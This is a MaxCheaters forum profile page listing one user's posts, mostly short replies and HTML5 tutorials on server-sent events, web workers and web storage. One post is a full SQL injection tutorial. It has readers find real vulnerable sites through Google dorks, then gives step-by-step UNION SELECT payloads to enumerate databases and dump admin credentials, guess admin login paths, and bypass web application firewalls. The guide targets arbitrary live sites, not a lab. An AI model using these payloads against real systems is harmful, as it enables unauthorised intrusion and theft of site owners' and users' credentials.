MrHotFire's Content - Page 46 - MaxCheaters.com | Lineage 2 Development Marketplace Bots and Cheats

-1 karma for...?

MrHotFire posted a topic in Report Section

Why I get -1 karma?

Interlude Nice Weapon

MrHotFire replied to bekomen's topic in Client Development Discussion

Thanks for sharing.;)

Interlude L2J_Tool Buff Time Changer

MrHotFire replied to bekomen's topic in Server Development Discussion [L2J]

Thanks for sharing it too.

Tutorial Full Basic SQL Injection

MrHotFire posted a topic in Hacking Tutorials & Guides

What Is an SQL Injection? An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc. In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily. Finding a Vulnerable Site You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this: inurl:news.php?id= inurl:event.php?id= inurl:order.php?id= inurl:user.php?id= inurl:restaurant.php?id= inurl:buy.php?id= There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection. Exploiting the Database Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example: http://www.hopefullyvulnerablesite.com/event.php?id=1 Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this: http://www.hopefullyvulnerablesite.com/event.php?id=1' Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable. Finding the number of columns Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this: http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2-- Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error. http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3-- *NO ERROR* http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4-- *NO ERROR* http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5-- *ERROR* Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error. Tip:The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command. Finding the vulnerable column We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4-- A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2. Tip:You HAVE to have the - after the =. That is critical. Determining the Version of the MySQL Database Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5. So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4-- Now it should display the Version on the page. It should look something like this: 5.1.47-community-log The numbers don't matter, as long as they're at least 5, or over. Finding the name of the Database The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is: http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata-- Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would prefferably be: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4-- Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff! Viewing the Tables in the Database The tables are what contains information. That's why we need to view them. So we can get the information we seek. The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- Hit enter, and the Tables in the Database will be displayed. :happyforever: Viewing the Tables' information We will most likely be given many tables. It is up to you to decide which one contains the valuable information. So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials" For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex. Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73 You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work. Displaying the Contents There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access. Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query: http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials-- That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. An where it says admin_credentials, you need to put the table that you are inside of. Now we should have all the credentials, so we just need to find the Admin Login. Finding the AdminLogin Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin. Like this: http://www.hopefullyvulnerablesite.com/admin http://www.hopefullyvulnerablesite.com/admin.php http://www.hopefullyvulnerablesite.com/login.php http://www.hopefullyvulnerablesite.com/admin/index.php http://www.hopefullyvulnerablesite.com/login/index.php http://www.hopefullyvulnerablesite.com/adminlogin http://www.hopefullyvulnerablesite.com/adminlogin.php http://www.hopefullyvulnerablesite.com/adminlogin/index.php http://www.hopefullyvulnerablesite.com/moderator.php http://www.hopefullyvulnerablesite.com/moderator http://www.hopefullyvulnerablesite.com/modlogin And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website. WAF By-Passing You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is. WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attakcs against the site. A WAF Error will look like this: FORBIDDEN You are not allowed to access "" on this server *INFORMATION ABOUT THE WEBSERVER IS HERE* If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack. There are several methods on how to by-pass the WAF, I will be explaining a few: 1. You don't have to worry about getting the number of columns, the Firewalls don't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall. The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3-- That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns. Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like: http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3-- To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3-- Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name. Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()-- Now, that will be displaying all the tables. Now that access the table's information, we're going to use this commdn to by-pass the firewall: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*-- There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use: http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE* And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :). If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck! :happyforever: :happyforever: :happyforever: :happyforever: :troll: :troll: :troll: :troll: :troll: :troll: :troll:

Pos dino karma eno eimai vip?

MrHotFire replied to MrHotFire's topic in Spam Topics

ahhahaha...:p

Pos dino karma eno eimai vip?

MrHotFire posted a topic in Spam Topics

Pos dinoume +1/-1karma eno eimaste vip? Rotaei enas filos mu.

{Tutorial}HTML5 Server-Sent Events.Step 35.

MrHotFire posted a topic in Coding Tutorials/Guides

Server-Sent Events - One Way Messaging A server-sent event is when a web page automatically gets updates from a server. This was also possible before, but the web page would have to ask if any updates were available. With server-sent events, the updates come automatically. Example: Facebook/Twitter updates, stock price updates, news feeds, sport results, etc. Browser Support Server-Sent Events are supported in all major browsers, except Internet Explorer. Receive Server-Sent Event Notifications The EventSource object is used to receive server-sent event notifications: var source=new EventSource("demo_sse.php"); source.onmessage=function(event) { document.getElementById("result").innerHTML+=event.data + "<br>"; }; Example explained: Create a new EventSource object, and specify the URL of the page sending the updates (in this example "demo_sse.php") Each time an update is received, the onmessage event occurs When an onmessage event occurs, put the received data into the element with id="result" Check Server-Sent Events Support In the tryit example above there were some extra lines of code to check browser support for server-sent events: if(typeof(EventSource)!=="undefined") { // Yes! Server-sent events support! // Some code..... } else { // Sorry! No server-sent events support.. } Server-Side Code Example For the example above to work, you need a server capable of sending data updates (like PHP or ASP). The server-side event stream syntax is simple. Set the "Content-Type" header to "text/event-stream". Now you can start sending event streams. Code in PHP (demo_sse.php): <?php header('Content-Type: text/event-stream'); header('Cache-Control: no-cache'); $time = date('r'); echo "data: The server time is: {$time}\n\n"; flush(); ?> Code in ASP (VB) (demo_sse.asp): <% Response.ContentType="text/event-stream" Response.Expires=-1 Response.Write("data: " & now()) Response.Flush() %> Code explained: Set the "Content-Type" header to "text/event-stream" Specify that the page should not cache Output the data to send (Always start with "data: ") Flush the output data back to the web page The EventSource Object In the examples above we used the onmessage event to get messages. But other events are also available: Events Description onopen When a connection to the server is opened onmessage When a message is received onerror When an error occurs :happyforever: :happyforever: :happyforever: :happyforever:

December 21, 2012

{Tutorial}HTML5 Web Workers.Step 34.

MrHotFire posted a topic in Coding Tutorials/Guides

What is a Web Worker? When executing scripts in an HTML page, the page becomes unresponsive until the script is finished. A web worker is a JavaScript that runs in the background, independently of other scripts, without affecting the performance of the page. You can continue to do whatever you want: clicking, selecting things, etc., while the web worker runs in the background. Browser Support Web workers are supported in all major browsers, except Internet Explorer. Check Web Worker Support Before creating a web worker, check whether the user's browser supports it: if(typeof(Worker)!=="undefined") { // Yes! Web worker support! // Some code..... } else { // Sorry! No Web Worker support.. } Create a Web Worker File Now, let's create our web worker in an external JavaScript. Here, we create a script that counts. The script is stored in the "demo_workers.js" file: var i=0; function timedCount() { i=i 1; postMessage(i); setTimeout("timedCount()",500); } timedCount(); The important part of the code above is the postMessage() method - which is used to posts a message back to the HTML page. Note: Normally web workers are not used for such simple scripts, but for more CPU intensive tasks. Create a Web Worker Object Now that we have the web worker file, we need to call it from an HTML page. The following lines checks if the worker already exists, if not - it creates a new web worker object and runs the code in "demo_workers.js": if(typeof(w)=="undefined") { w=new Worker("demo_workers.js"); } Then we can send and receive messages from the web worker. Add an "onmessage" event listener to the web worker. w.onmessage=function(event){ document.getElementById("result").innerHTML=event.data; }; When the web worker posts a message, the code within the event listener is executed. The data from the web worker is stored in event.data. Terminate a Web Worker When a web worker object is created, it will continue to listen for messages (even after the external script is finished) until it is terminated. To terminate a web worker, and free browser/computer resources, use the terminate() method: w.terminate(); Full Web Worker Example Code We have already seen the Worker code in the .js file. Below is the code for the HTML page: <!DOCTYPE html> <html> <body> <p>Count numbers: <output id="result"></output></p> <button onclick="startWorker()">Start Worker</button> <button onclick="stopWorker()">Stop Worker</button> <br><br> <script> var w; function startWorker() { if(typeof(Worker)!=="undefined") { if(typeof(w)=="undefined") { w=new Worker("demo_workers.js"); } w.onmessage = function (event) { document.getElementById("result").innerHTML=event.data; }; } else { document.getElementById("result").innerHTML="Sorry, your browser does not support Web Workers..."; } } function stopWorker() { w.terminate(); } </script> </body> </html> Web Workers and the DOM Since web workers are in external files, they do not have access to the following JavaScript objects: The window object The document object The parent object :happyforever: :happyforever: :happyforever: :happyforever:

December 21, 2012

{Tutorial}HTML5 Application Cache.Step 33.

MrHotFire posted a topic in Coding Tutorials/Guides

What is HTML5 Web Storage? With HTML5, web pages can store data locally within the user's browser. Earlier, this was done with cookies. However, Web Storage is more secure and faster. The data is not included with every server request, but used ONLY when asked for. It is also possible to store large amounts of data, without affecting the website's performance. The data is stored in key/value pairs, and a web page can only access data stored by itself. Browser Support Web storage is supported in Internet Explorer 8+, Firefox, Opera, Chrome, and Safari. Note: Internet Explorer 7 and earlier versions, do not support web storage. localStorage and sessionStorage There are two new objects for storing data on the client: localStorage - stores data with no expiration date sessionStorage - stores data for one session Before using web storage, check browser support for localStorage and sessionStorage: if(typeof(Storage)!=="undefined") { // Yes! localStorage and sessionStorage support! // Some code..... } else { // Sorry! No web storage support.. } The localStorage Object The localStorage object stores the data with no expiration date. The data will not be deleted when the browser is closed, and will be available the next day, week, or year. localStorage.lastname="Smith"; document.getElementById("result").innerHTML="Last name: " + localStorage.lastname; Example explained: Create a localStorage key/value pair with key="lastname" and value="Smith" Retrieve the value of the "lastname" key and insert it into the element with id="result" Tip: Key/value pairs are always stored as strings. Remember to convert them to another format when needed. The following example counts the number of times a user has clicked a button. In this code the value string is converted to a number to be able to increase the counter: if (localStorage.clickcount) { localStorage.clickcount=Number(localStorage.clickcount)+1; } else { localStorage.clickcount=1; } document.getElementById("result").innerHTML="You have clicked the button " + localStorage.clickcount + " time(s)."; The sessionStorage Object The sessionStorage object is equal to the localStorage object, except that it stores the data for only one session. The data is deleted when the user closes the browser window. The following example counts the number of times a user has clicked a button, in the current session: if (sessionStorage.clickcount) { sessionStorage.clickcount=Number(sessionStorage.clickcount)+1; } else { sessionStorage.clickcount=1; } document.getElementById("result").innerHTML="You have clicked the button " + sessionStorage.clickcount + " time(s) in this session."; :happyforever: :happyforever: :happyforever: